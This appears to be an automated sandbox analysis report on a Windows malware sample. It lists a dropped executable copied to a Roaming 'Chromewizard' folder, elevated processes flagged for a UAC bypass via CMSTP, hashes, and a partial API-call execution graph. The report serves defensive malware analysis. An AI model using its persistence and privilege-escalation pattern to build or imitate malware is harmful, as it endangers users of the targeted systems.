                                                                                                      Path:C:\Users\user\Desktop\9mauyKC3JW.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\Desktop\9mauyKC3JW.exe"
                                                                                                      Imagebase:0x400000
                                                                                                      File size:9'118'184 bytes
                                                                                                      MD5 hash:AE130C89B7D8C4C9FD06422FAEB79FC9
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:2
                                                                                                      Start time:02:15:08
                                                                                                      Start date:27/12/2024
                                                                                                      Path:C:\Users\user\AppData\Local\Temp\hv.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\AppData\Local\Temp\hv.exe"
                                                                                                      Imagebase:0xe20000
                                                                                                      File size:9'094'368 bytes
                                                                                                      MD5 hash:480F8CF600F5509595B8418C6534CAF2
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:Borland Delphi
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000002.00000002.1486704045.000000000CA16000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:3
                                                                                                      Start time:02:15:09
                                                                                                      Start date:27/12/2024
                                                                                                      Path:C:\Users\user\AppData\Roaming\Chromewizard\hv.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Users\user\AppData\Roaming\Chromewizard\hv.exe
                                                                                                      Imagebase:0x1a0000
                                                                                                      File size:9'094'368 bytes
                                                                                                      MD5 hash:480F8CF600F5509595B8418C6534CAF2
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:Borland Delphi
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:4
                                                                                                      Start time:02:15:11
                                                                                                      Start date:27/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Imagebase:0xa40000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000004.00000002.1776755377.0000000005769000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:5
                                                                                                      Start time:02:15:11
                                                                                                      Start date:27/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:8
                                                                                                      Start time:02:15:36
                                                                                                      Start date:27/12/2024
                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Localdockerv3.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\Localdockerv3.exe
                                                                                                      Imagebase:0x140000000
                                                                                                      File size:2'364'728 bytes
                                                                                                      MD5 hash:967F4470627F823F4D7981E511C9824F
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000008.00000002.2161193085.0000000002804000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Antivirus matches:
                                                                                                      • Detection: 0%, ReversingLabs
                                                                                                      Reputation:moderate
                                                                                                      Has exited:true

                                                                                                      Target ID:9
                                                                                                      Start time:02:15:37
                                                                                                      Start date:27/12/2024
                                                                                                      Path:C:\Users\user\AppData\Roaming\Chromewizard\hv.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Chromewizard\hv.exe"
                                                                                                      Imagebase:0x1a0000
                                                                                                      File size:9'094'368 bytes
                                                                                                      MD5 hash:480F8CF600F5509595B8418C6534CAF2
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:Borland Delphi
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:10
                                                                                                      Start time:02:15:39
                                                                                                      Start date:27/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Imagebase:0xa40000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.1869601740.0000000002D60000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000000A.00000002.1869821197.0000000004F1A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:11
                                                                                                      Start time:02:15:39
                                                                                                      Start date:27/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:false
                                                                                                      Has administrator privileges:false
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Reputation:high
                                                                                                      Has exited:true

                                                                                                      Target ID:15
                                                                                                      Start time:02:15:50
                                                                                                      Start date:27/12/2024
                                                                                                      Path:C:\Users\user\AppData\Roaming\Chromewizard\hv.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:"C:\Users\user\AppData\Roaming\Chromewizard\hv.exe"
                                                                                                      Imagebase:0x1a0000
                                                                                                      File size:9'094'368 bytes
                                                                                                      MD5 hash:480F8CF600F5509595B8418C6534CAF2
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:Borland Delphi
                                                                                                      Reputation:low
                                                                                                      Has exited:true

                                                                                                      Target ID:16
                                                                                                      Start time:02:15:50
                                                                                                      Start date:27/12/2024
                                                                                                      Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Wow64 process (32bit):true
                                                                                                      Commandline:C:\Windows\SysWOW64\cmd.exe
                                                                                                      Imagebase:0xa40000
                                                                                                      File size:236'544 bytes
                                                                                                      MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000010.00000002.2093039853.0000000005611000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Has exited:true

                                                                                                      Target ID:17
                                                                                                      Start time:02:15:51
                                                                                                      Start date:27/12/2024
                                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                      Imagebase:0x7ff6ee680000
                                                                                                      File size:862'208 bytes
                                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Has exited:true

                                                                                                      Target ID:20
                                                                                                      Start time:02:16:07
                                                                                                      Start date:27/12/2024
                                                                                                      Path:C:\Users\user\AppData\Local\Temp\Localdockerv3.exe
                                                                                                      Wow64 process (32bit):false
                                                                                                      Commandline:C:\Users\user\AppData\Local\Temp\Localdockerv3.exe
                                                                                                      Imagebase:0x140000000
                                                                                                      File size:2'364'728 bytes
                                                                                                      MD5 hash:967F4470627F823F4D7981E511C9824F
                                                                                                      Has elevated privileges:true
                                                                                                      Has administrator privileges:true
                                                                                                      Programmed in:C, C++ or other language
                                                                                                      Yara matches:
                                                                                                      • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000014.00000002.2211481934.0000000002782000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                                                                                      Has exited:true

                                                                                                      Reset < >

                                                                                                        Execution Graph

                                                                                                        Execution Coverage:17.7%
                                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                                        Signature Coverage:25.9%
                                                                                                        Total number of Nodes:1474
                                                                                                        Total number of Limit Nodes:20
                                                                                                        execution_graph 9006 410e7f 9007 410e9a 9006->9007 9008 410eb5 9007->9008 9010 40f42d 9007->9010 9011 40f445 free 9010->9011 9012 40f437 9010->9012 9013 4024e7 46 API calls 9011->9013 9012->9011 9014 40f456 9012->9014 9013->9014 9014->9008 10837 411a2d _EH_prolog 10840 4117b9 10837->10840 10839 411a61 10841 4117e9 10840->10841 10842 4117cd 10840->10842 10841->10839 10842->10841 10860 40e58f 10842->10860 10845 40e58f 47 API calls 10846 411801 10845->10846 10846->10841 10847 40e58f 47 API calls 10846->10847 10848 411813 10847->10848 10848->10841 10849 40e58f 47 API calls 10848->10849 10850 411828 10849->10850 10850->10841 10866 40e9b5 10850->10866 10852 41183d 10852->10841 10872 41168a 10852->10872 10854 411a16 10882 40ea88 10854->10882 10857 41164e _CxxThrowException 10859 4118a0 10857->10859 10858 4115a9 memmove _CxxThrowException 10858->10859 10859->10841 10859->10854 10859->10857 10859->10858 10876 4116c7 10859->10876 10861 40e59e 10860->10861 10862 40e5b9 10861->10862 10886 40e556 10861->10886 10862->10841 10862->10845 10865 4024c4 46 API calls 10865->10862 10867 40e9c4 10866->10867 10868 40e9de 10867->10868 10890 40e964 10867->10890 10868->10852 10871 4024c4 46 API calls 10871->10868 10873 411693 10872->10873 10875 4116c4 10873->10875 10894 40e63c 10873->10894 10875->10859 10877 411726 10876->10877 10878 4116df 10876->10878 10879 411709 10877->10879 10881 40e63c _CxxThrowException 10877->10881 10878->10879 10880 40e63c _CxxThrowException 10878->10880 10879->10859 10880->10879 10881->10879 10883 40ea8d 10882->10883 10884 40eaa0 10883->10884 10901 40e9f7 10883->10901 10884->10841 10889 401b1f VirtualFree 10886->10889 10888 40e561 10888->10865 10889->10888 10893 401b1f VirtualFree 10890->10893 10892 40e96e 10892->10871 10893->10892 10897 40e5d3 10894->10897 10898 40e5e1 10897->10898 10899 40e5e5 10897->10899 10898->10873 10899->10898 10900 40e60a _CxxThrowException 10899->10900 10900->10898 10902 40ea0b 10901->10902 10903 40ea30 10902->10903 10904 40ea1c memmove 10902->10904 10903->10883 10904->10903 8238 4096c7 _EH_prolog 8252 4096fa 8238->8252 8239 40971c 8240 409827 8273 40118a 8240->8273 8242 4094e0 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8242->8252 8243 409851 8246 40985e ??2@YAPAXI 8243->8246 8244 40983c 8324 409425 8244->8324 8247 409878 8246->8247 8253 4098c2 8247->8253 8254 409925 ??2@YAPAXI 8247->8254 8258 409530 3 API calls 8247->8258 8260 409425 ctype 3 API calls 8247->8260 8262 4099a2 8247->8262 8267 409a65 8247->8267 8283 409fb4 8247->8283 8287 408ea4 8247->8287 8330 409c13 ??2@YAPAXI 8247->8330 8332 409f49 8247->8332 8248 40969d 8 API calls 8248->8252 8250 40e959 VirtualFree ??3@YAXPAX free free ctype 8250->8252 8252->8239 8252->8240 8252->8242 8252->8248 8252->8250 8317 4095b7 8252->8317 8321 409403 8252->8321 8327 409530 8253->8327 8254->8247 8258->8247 8260->8247 8263 409530 3 API calls 8262->8263 8264 4099c7 8263->8264 8265 409425 ctype 3 API calls 8264->8265 8265->8239 8269 409530 3 API calls 8267->8269 8270 409a84 8269->8270 8271 409425 ctype 3 API calls 8270->8271 8271->8239 8274 401198 GetDiskFreeSpaceExW 8273->8274 8275 4011ee SendMessageW 8273->8275 8274->8275 8276 4011b0 8274->8276 8277 4011d6 8275->8277 8276->8275 8278 401f9d 19 API calls 8276->8278 8277->8243 8277->8244 8279 4011c9 8278->8279 8280 407717 25 API calls 8279->8280 8281 4011cf 8280->8281 8281->8277 8282 4011e7 8281->8282 8282->8275 8284 409fdd 8283->8284 8336 409dff 8284->8336 8610 40aef3 8287->8610 8290 408ec1 8290->8247 8292 408fd5 8628 408b7c 8292->8628 8293 408f0d ??2@YAPAXI 8302 408ef5 8293->8302 8295 408f31 ??2@YAPAXI 8295->8302 8302->8292 8302->8293 8302->8295 8671 40cdb8 ??2@YAPAXI 8302->8671 8318 4095c6 8317->8318 8320 4095cc 8317->8320 8318->8252 8319 4095e2 _CxxThrowException 8319->8318 8320->8318 8320->8319 8322 40e8e2 4 API calls 8321->8322 8323 40940b 8322->8323 8323->8252 8325 40e8da ctype 3 API calls 8324->8325 8326 409433 8325->8326 8328 408963 ctype 3 API calls 8327->8328 8329 40953b 8328->8329 8331 409c45 8330->8331 8331->8247 8334 409f4e 8332->8334 8333 409f75 8333->8247 8334->8333 8335 409cde 110 API calls 8334->8335 8335->8334 8339 409e04 8336->8339 8337 409e3a 8337->8247 8339->8337 8340 409cde 8339->8340 8341 409cf8 8340->8341 8345 401626 8341->8345 8408 40db1f 8341->8408 8342 409d2c 8342->8339 8346 401642 8345->8346 8352 401638 8345->8352 8411 40a62f _EH_prolog 8346->8411 8348 40166f 8455 40eca9 8348->8455 8349 401411 2 API calls 8351 401688 8349->8351 8353 401962 ??3@YAXPAX 8351->8353 8354 40169d 8351->8354 8352->8342 8358 40eca9 VariantClear 8353->8358 8437 401329 8354->8437 8357 4016a8 8441 401454 8357->8441 8358->8352 8361 401362 2 API calls 8362 4016c7 ??3@YAXPAX 8361->8362 8367 4016d9 8362->8367 8394 401928 ??3@YAXPAX 8362->8394 8364 40eca9 VariantClear 8364->8352 8365 4016fa 8366 40eca9 VariantClear 8365->8366 8368 401702 ??3@YAXPAX 8366->8368 8367->8365 8369 401764 8367->8369 8382 401725 8367->8382 8368->8348 8372 4017a2 8369->8372 8373 401789 8369->8373 8370 40eca9 VariantClear 8371 401737 ??3@YAXPAX 8370->8371 8371->8348 8375 4017c4 GetLocalTime SystemTimeToFileTime 8372->8375 8376 4017aa 8372->8376 8374 40eca9 VariantClear 8373->8374 8377 401791 ??3@YAXPAX 8374->8377 8375->8376 8378 4017e1 8376->8378 8379 4017f8 8376->8379 8376->8382 8377->8348 8459 403354 lstrlenW 8378->8459 8446 40301a GetFileAttributesW 8379->8446 8382->8370 8384 401934 GetLastError 8384->8394 8385 401818 ??2@YAPAXI 8387 401824 8385->8387 8386 40192a 8386->8384 8483 40db53 8387->8483 8390 40190f 8393 40eca9 VariantClear 8390->8393 8391 40185f GetLastError 8486 4012f7 8391->8486 8393->8394 8394->8364 8395 401871 8396 403354 86 API calls 8395->8396 8399 40187f ??3@YAXPAX 8395->8399 8397 4018cc 8396->8397 8397->8399 8401 40db53 2 API calls 8397->8401 8400 40189c 8399->8400 8402 40eca9 VariantClear 8400->8402 8403 4018f1 8401->8403 8404 4018aa ??3@YAXPAX 8402->8404 8405 4018f5 GetLastError 8403->8405 8406 401906 ??3@YAXPAX 8403->8406 8404->8348 8405->8399 8406->8390 8602 40da56 8408->8602 8412 40a738 8411->8412 8413 40a66a 8411->8413 8414 40a687 8412->8414 8415 40a73d 8412->8415 8413->8414 8416 40a704 8413->8416 8417 40a679 8413->8417 8423 40a6ad 8414->8423 8515 40a3b0 8414->8515 8420 40a747 8415->8420 8422 40a699 8415->8422 8424 40a6f2 8415->8424 8416->8423 8489 40e69c 8416->8489 8418 40a67e 8417->8418 8417->8424 8427 40a684 8418->8427 8435 40a6b2 8418->8435 8420->8424 8420->8435 8422->8423 8503 40ed59 8422->8503 8498 40ecae 8423->8498 8511 40ed34 8424->8511 8426 40a71a 8492 40eced 8426->8492 8427->8414 8427->8422 8433 40eca9 VariantClear 8434 40166b 8433->8434 8434->8348 8434->8349 8435->8423 8507 40ed79 8435->8507 8438 401340 8437->8438 8439 40112b 2 API calls 8438->8439 8440 40134b 8439->8440 8440->8357 8442 4012f7 2 API calls 8441->8442 8443 401462 8442->8443 8530 4013e2 8443->8530 8445 40146d 8445->8361 8447 403037 8446->8447 8453 401804 8446->8453 8448 403048 8447->8448 8449 40303b SetLastError 8447->8449 8450 403051 8448->8450 8452 40305f FindFirstFileW 8448->8452 8448->8453 8449->8453 8533 402fed 8450->8533 8452->8450 8454 403072 FindClose CompareFileTime 8452->8454 8453->8384 8453->8385 8453->8386 8454->8450 8454->8453 8456 40ec65 8455->8456 8457 40ec86 VariantClear 8456->8457 8458 40ec9d 8456->8458 8457->8352 8458->8352 8460 4024fc 2 API calls 8459->8460 8461 403375 8460->8461 8462 40112b 2 API calls 8461->8462 8465 403385 8461->8465 8462->8465 8464 4033d3 GetSystemTimeAsFileTime GetFileAttributesW 8466 4033e8 8464->8466 8467 4033f2 8464->8467 8465->8464 8474 403477 8465->8474 8574 401986 CreateDirectoryW 8465->8574 8468 40301a 22 API calls 8466->8468 8469 401986 4 API calls 8467->8469 8479 4033f8 ??3@YAXPAX 8467->8479 8468->8467 8482 403405 8469->8482 8470 4034a7 8471 407776 55 API calls 8470->8471 8477 4034b1 ??3@YAXPAX 8471->8477 8472 40340a 8580 407776 8472->8580 8474->8470 8474->8479 8475 40346b ??3@YAXPAX 8480 4034bc 8475->8480 8476 40341d memcpy 8476->8482 8477->8480 8479->8480 8480->8382 8481 401986 4 API calls 8481->8482 8482->8472 8482->8475 8482->8476 8482->8481 8599 40db3c 8483->8599 8487 40112b 2 API calls 8486->8487 8488 401311 8487->8488 8488->8395 8490 4012f7 2 API calls 8489->8490 8491 40e6a9 8490->8491 8491->8426 8519 40ecd7 8492->8519 8495 40ed12 8496 40a726 ??3@YAXPAX 8495->8496 8497 40ed17 _CxxThrowException 8495->8497 8496->8423 8497->8496 8522 40ec65 8498->8522 8500 40ecba 8501 40a7b2 8500->8501 8502 40ecbe memcpy 8500->8502 8501->8433 8502->8501 8504 40ed62 8503->8504 8505 40ed67 8503->8505 8506 40ecd7 VariantClear 8504->8506 8505->8423 8506->8505 8508 40ed82 8507->8508 8509 40ed87 8507->8509 8510 40ecd7 VariantClear 8508->8510 8509->8423 8510->8509 8512 40ed42 8511->8512 8513 40ed3d 8511->8513 8512->8423 8514 40ecd7 VariantClear 8513->8514 8514->8512 8516 40a3c2 8515->8516 8517 40a3de 8516->8517 8526 40eda0 8516->8526 8517->8423 8520 40eca9 VariantClear 8519->8520 8521 40ecdf SysAllocString 8520->8521 8521->8495 8521->8496 8523 40ec6d 8522->8523 8524 40ec86 VariantClear 8523->8524 8525 40ec9d 8523->8525 8524->8500 8525->8500 8527 40edae 8526->8527 8528 40eda9 8526->8528 8527->8517 8529 40ecd7 VariantClear 8528->8529 8529->8527 8531 401398 2 API calls 8530->8531 8532 4013f2 8531->8532 8532->8445 8539 402c86 8533->8539 8535 402ff6 8536 403017 8535->8536 8537 402ffb GetLastError 8535->8537 8536->8453 8538 403006 8537->8538 8538->8453 8540 402c93 GetFileAttributesW 8539->8540 8541 402c8f 8539->8541 8542 402ca4 8540->8542 8543 402ca9 8540->8543 8541->8535 8542->8535 8544 402cc7 8543->8544 8545 402cad SetFileAttributesW 8543->8545 8550 402b79 8544->8550 8547 402cc3 8545->8547 8548 402cba DeleteFileW 8545->8548 8547->8535 8548->8535 8551 4024fc 2 API calls 8550->8551 8552 402b90 8551->8552 8553 40254d 2 API calls 8552->8553 8554 402b9d FindFirstFileW 8553->8554 8555 402c55 SetFileAttributesW 8554->8555 8570 402bbf 8554->8570 8557 402c60 RemoveDirectoryW 8555->8557 8558 402c78 ??3@YAXPAX 8555->8558 8556 401329 2 API calls 8556->8570 8557->8558 8559 402c6d ??3@YAXPAX 8557->8559 8560 402c80 8558->8560 8559->8560 8560->8535 8562 40254d 2 API calls 8562->8570 8563 402c24 SetFileAttributesW 8563->8558 8567 402c2d DeleteFileW 8563->8567 8564 402bef lstrcmpW 8565 402c05 lstrcmpW 8564->8565 8566 402c38 FindNextFileW 8564->8566 8565->8566 8565->8570 8568 402c4e FindClose 8566->8568 8566->8570 8567->8570 8568->8555 8569 402b79 2 API calls 8569->8570 8570->8556 8570->8558 8570->8562 8570->8563 8570->8564 8570->8566 8570->8569 8571 401429 8570->8571 8572 401398 2 API calls 8571->8572 8573 401433 8572->8573 8573->8570 8575 4019c7 8574->8575 8576 401997 GetLastError 8574->8576 8575->8465 8577 4019b1 GetFileAttributesW 8576->8577 8579 4019a6 8576->8579 8577->8575 8577->8579 8578 4019a7 SetLastError 8578->8465 8579->8575 8579->8578 8581 401f9d 19 API calls 8580->8581 8582 40778a wvsprintfW 8581->8582 8583 407859 8582->8583 8584 4077ab GetLastError FormatMessageW 8582->8584 8587 4076a8 25 API calls 8583->8587 8585 4077d9 FormatMessageW 8584->8585 8586 4077ee lstrlenW lstrlenW ??2@YAPAXI lstrcpyW lstrcpyW 8584->8586 8585->8583 8585->8586 8591 4076a8 8586->8591 8590 407865 8587->8590 8590->8479 8592 407715 ??3@YAXPAX LocalFree 8591->8592 8593 4076b7 8591->8593 8592->8590 8594 40661a 2 API calls 8593->8594 8595 4076c6 IsWindow 8594->8595 8596 4076ef 8595->8596 8597 4076dd IsBadReadPtr 8595->8597 8598 4073d1 21 API calls 8596->8598 8597->8596 8598->8592 8600 40db1f 2 API calls 8599->8600 8601 401857 8600->8601 8601->8390 8601->8391 8607 40d985 8602->8607 8605 40da65 CreateFileW 8606 40da8a 8605->8606 8606->8342 8608 40d98f CloseHandle 8607->8608 8609 40d99a 8607->8609 8608->8609 8609->8605 8609->8606 8611 40af0c 8610->8611 8626 408ebd 8610->8626 8611->8626 8701 40ac7a 8611->8701 8613 40af3f 8614 40ac7a 7 API calls 8613->8614 8615 40b0cb 8613->8615 8619 40af96 8614->8619 8617 40e959 ctype 4 API calls 8615->8617 8616 40afbd 8708 40e959 8616->8708 8617->8626 8619->8615 8619->8616 8620 40b043 8621 40e959 ctype 4 API calls 8620->8621 8624 40b07f 8621->8624 8622 408761 _CxxThrowException ??2@YAPAXI memcpy ??3@YAXPAX 8623 40afc6 8622->8623 8623->8620 8623->8622 8625 40e959 ctype 4 API calls 8624->8625 8625->8626 8626->8290 8627 4065ea InitializeCriticalSection 8626->8627 8627->8302 8720 4086f0 8628->8720 8672 40cdc7 8671->8672 8673 408761 4 API calls 8672->8673 8674 40cdde 8673->8674 8674->8302 8702 40e8da ctype 3 API calls 8701->8702 8703 40ac86 8702->8703 8712 40e811 8703->8712 8705 40aca2 8705->8613 8706 409403 4 API calls 8707 40ac90 8706->8707 8707->8705 8707->8706 8709 40e93b 8708->8709 8710 40e8da ctype 3 API calls 8709->8710 8711 40e943 ??3@YAXPAX 8710->8711 8711->8623 8713 40e8a5 8712->8713 8714 40e824 8712->8714 8713->8707 8715 40e833 _CxxThrowException 8714->8715 8716 40e863 ??2@YAPAXI 8714->8716 8717 40e895 ??3@YAXPAX 8714->8717 8715->8714 8716->8714 8718 40e879 memcpy 8716->8718 8717->8713 8718->8717 8721 40e8da ctype 3 API calls 8720->8721 8722 4086f8 8721->8722 8723 40e8da ctype 3 API calls 8722->8723 8724 408700 8723->8724 8725 40e8da ctype 3 API calls 8724->8725 8726 408708 8725->8726 9015 40dace 9018 40daac 9015->9018 9021 40da8f 9018->9021 9022 40da56 2 API calls 9021->9022 9023 40daa9 9022->9023 9005 40dadc ReadFile 9024 411def __set_app_type __p__fmode __p__commode 9025 411e5e 9024->9025 9026 411e72 9025->9026 9027 411e66 __setusermatherr 9025->9027 9036 411f66 _controlfp 9026->9036 9027->9026 9029 411e77 _initterm __getmainargs _initterm 9030 411ecb GetStartupInfoA 9029->9030 9032 411eff GetModuleHandleA 9030->9032 9037 4064af _EH_prolog 9032->9037 9036->9029 9040 404faa 9037->9040 9345 401b37 GetModuleHandleW CreateWindowExW 9040->9345 9043 404fdc 9044 40648e MessageBoxA 9043->9044 9046 404ff6 9043->9046 9045 4064a5 exit _XcptFilter 9044->9045 9047 401411 2 API calls 9046->9047 9048 40502d 9047->9048 9049 401411 2 API calls 9048->9049 9050 405035 9049->9050 9348 403e23 9050->9348 9055 40254d 2 API calls 9056 405073 9055->9056 9357 402a69 9056->9357 9058 40507c 9371 403d71 9058->9371 9061 40509b _wtol 9063 4050b1 9061->9063 9376 404405 9063->9376 9064 4050d6 9065 403d71 6 API calls 9064->9065 9066 4050e1 9065->9066 9067 4050e7 9066->9067 9068 405118 9066->9068 9533 404996 9067->9533 9069 405130 GetModuleFileNameW 9068->9069 9071 40112b 2 API calls 9068->9071 9072 405151 9069->9072 9073 405142 9069->9073 9071->9069 9078 403d71 6 API calls 9072->9078 9075 407776 55 API calls 9073->9075 9074 4050ee ??3@YAXPAX 9551 403e70 9074->9551 9083 4050ec 9075->9083 9077 4050ff ??3@YAXPAX ??3@YAXPAX 9077->9045 9090 405173 9078->9090 9079 4052d5 9080 401362 2 API calls 9079->9080 9081 4052e5 9080->9081 9082 401362 2 API calls 9081->9082 9087 4052f2 9082->9087 9083->9074 9084 4051fa 9084->9083 9085 40522a 9084->9085 9089 405213 _wtol 9084->9089 9086 403d71 6 API calls 9085->9086 9095 405289 9086->9095 9088 40538d ??2@YAPAXI 9087->9088 9091 401329 2 API calls 9087->9091 9097 405399 9088->9097 9089->9085 9090->9079 9090->9083 9090->9084 9090->9085 9094 401429 2 API calls 9090->9094 9092 405327 9091->9092 9093 401329 2 API calls 9092->9093 9099 40533d 9093->9099 9094->9090 9095->9079 9096 404594 2 API calls 9095->9096 9098 4052ba 9096->9098 9100 4053cf 9097->9100 9104 407776 55 API calls 9097->9104 9098->9079 9102 401362 2 API calls 9098->9102 9103 401362 2 API calls 9099->9103 9401 4025ae 9100->9401 9102->9079 9106 405367 9103->9106 9104->9100 9108 401f9d 19 API calls 9106->9108 9107 4025ae 2 API calls 9110 4053f6 9107->9110 9109 40536e 9108->9109 9111 40254d 2 API calls 9109->9111 9112 4025ae 2 API calls 9110->9112 9113 405377 9111->9113 9114 4053fe 9112->9114 9113->9088 9404 404e3f 9114->9404 9119 40546f 9121 405534 9119->9121 9124 403d71 6 API calls 9119->9124 9120 402844 10 API calls 9122 405441 9120->9122 9123 40e8da ctype 3 API calls 9121->9123 9122->9119 9127 407776 55 API calls 9122->9127 9125 40553c 9123->9125 9126 405493 9124->9126 9128 405573 9125->9128 9582 403093 9125->9582 9126->9121 9134 40549d 9126->9134 9129 405450 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9127->9129 9131 405506 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9128->9131 9132 40557c 9128->9132 9129->9119 9131->9074 9131->9083 9136 405588 wsprintfW 9132->9136 9137 4055ed 9132->9137 9143 401411 2 API calls 9132->9143 9144 401329 ??2@YAPAXI ??3@YAXPAX 9132->9144 9147 401f9d 19 API calls 9132->9147 9616 402f6c ??2@YAPAXI 9132->9616 9622 402425 ??3@YAXPAX ??3@YAXPAX 9132->9622 9134->9131 9556 404cbc 9134->9556 9135 405556 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9138 4054f5 9135->9138 9139 401411 2 API calls 9136->9139 9432 404603 9137->9432 9138->9131 9139->9132 9142 4054cc 9142->9131 9145 407776 55 API calls 9142->9145 9143->9132 9144->9132 9146 4054da ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9145->9146 9146->9138 9147->9132 9148 40584a 9149 404603 26 API calls 9148->9149 9182 40586a 9149->9182 9151 403b94 lstrlenW lstrlenW _wcsnicmp 9176 4055f6 9151->9176 9154 405933 9494 404034 9154->9494 9155 4024fc 2 API calls 9155->9182 9159 4059d8 CoInitialize 9166 40243b lstrcmpW 9159->9166 9160 40595a 9163 40243b lstrcmpW 9160->9163 9161 405935 ??3@YAXPAX 9161->9154 9165 405969 9163->9165 9164 401411 ??2@YAPAXI ??3@YAXPAX 9164->9182 9167 405979 9165->9167 9169 401f9d 19 API calls 9165->9169 9168 4059fe 9166->9168 9649 403b40 9167->9649 9170 405a12 9168->9170 9173 401329 2 API calls 9168->9173 9169->9167 9500 403b59 9170->9500 9172 401362 2 API calls 9172->9182 9173->9170 9176->9148 9176->9151 9192 4057dd _wtol 9176->9192 9208 405878 ??3@YAXPAX ??3@YAXPAX ??3@YAXPAX 9176->9208 9623 40484d 9176->9623 9634 40408b 9176->9634 9178 